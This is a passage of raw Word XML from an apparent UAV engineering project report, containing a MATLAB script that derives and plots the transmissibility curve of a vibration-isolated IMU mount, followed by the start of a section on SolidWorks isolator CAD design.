        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DBF2EE" wp14:editId="22035C18">
            <wp:extent cx="5333365" cy="3998595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5333365" cy="3998595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67233281" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C557DDE" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Project: Cyber-Physical UAV Flight Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA82EC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Script: Transmissibility Curve Derivation for IMU Mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D3FF9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>clear; clc; close all;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BFBAF" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% System Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D36CAC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>m = 0.025;      % IMU + Mounting Plate mass (25 grams)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FCE550" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>k = 1800;       % Total stiffness of 4 Shore 30A mounts (N/m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F61E61" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>c = 1.2;        % Viscous damping coefficient (N*s/m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF853DD" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Derived Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB64364" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>wn = sqrt(k/m);               % Natural angular frequency (rad/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4421C6" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>fn = wn / (2*pi);             % Natural frequency (Hz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0AFF4" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>zeta = c / (2*sqrt(k*m));     % Damping ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAE368" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Frequency Range (0 to 200 Hz covers standard BLDC motor excitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2D65C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>f = linspace(0, 200, 2000);   % Excitation frequency in Hz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03166F80" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>w = 2 * pi * f;               % Excitation angular frequency (rad/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC04071" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>r = w ./ wn;                  % Frequency ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074F8B6" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Calculate Transmissibility Tr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22761771" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>num = 1 + (2 * zeta * r).^2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DFBCE" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>den = (1 - r.^2).^2 + (2 * zeta * r).^2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161E431" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>Tr = sqrt(num ./ den);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637BFF88" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Isolation Boundary Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706F0C1" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>r_iso = sqrt(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504EE89D" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>f_iso = r_iso * fn;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EBA54" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Plotting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F2CEA" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>figure('Name', 'IMU Transmissibility Spectrum', 'Color', [1 1 1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAE558" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>plot(f, Tr, 'k-', 'LineWidth', 2); hold on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D6716" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Threshold lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18BC96" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>yline(1.0, 'r--', 'LineWidth', 1.2, 'DisplayName', 'Unity (No Isolation)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207C199" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>xline(fn, 'b:', 'LineWidth', 1.2, 'DisplayName', sprintf('Resonance (f_n = %.1f Hz)', fn));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9AF522" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>xline(f_iso, 'g--', 'LineWidth', 1.2, 'DisplayName', sprintf('Isolation Start (%.1f Hz)', f_iso));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAD810" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>% Highlight Isolation Zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFDF4A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>patch([f_iso 200 200 f_iso], [0 0 1 1], [0.8 0.95 0.8], ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625EEED" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t xml:space="preserve">      'FaceAlpha', 0.3, 'EdgeColor', 'none', 'DisplayName', 'Isolation Region (Tr &lt; 1)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084BDA29" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>xlabel('Excitation Frequency f (Hz)');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD0520" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>ylabel('Transmissibility T_r');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA793C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>title('IMU Mount Transmissibility vs Excitation Frequency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9E01E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>legend('Location', 'northeast');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A7B944" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>grid on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B1B6E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ylim([0 4]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD80780" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="196B24"/>
        </w:rPr>
        <w:t>xlim([0 200]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4B0B6" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451C0F95" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Part 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E9C52" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>mechanical cad and physical isolator design (solidworks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FE3C8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>mathematical criteria is Fn= 42.7hz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2625F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>isolation starts at Fiso= 60.4hz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4B3E0" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>CAD DESIGN OF THE REASONANT PLATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1795584B" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F0D111" wp14:editId="32917CE7">
            <wp:extent cx="5731510" cy="4043680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4043680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768E666" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="127169FC" wp14:editId="23FBA7A3">
            <wp:extent cx="5731510" cy="3839845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3839845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
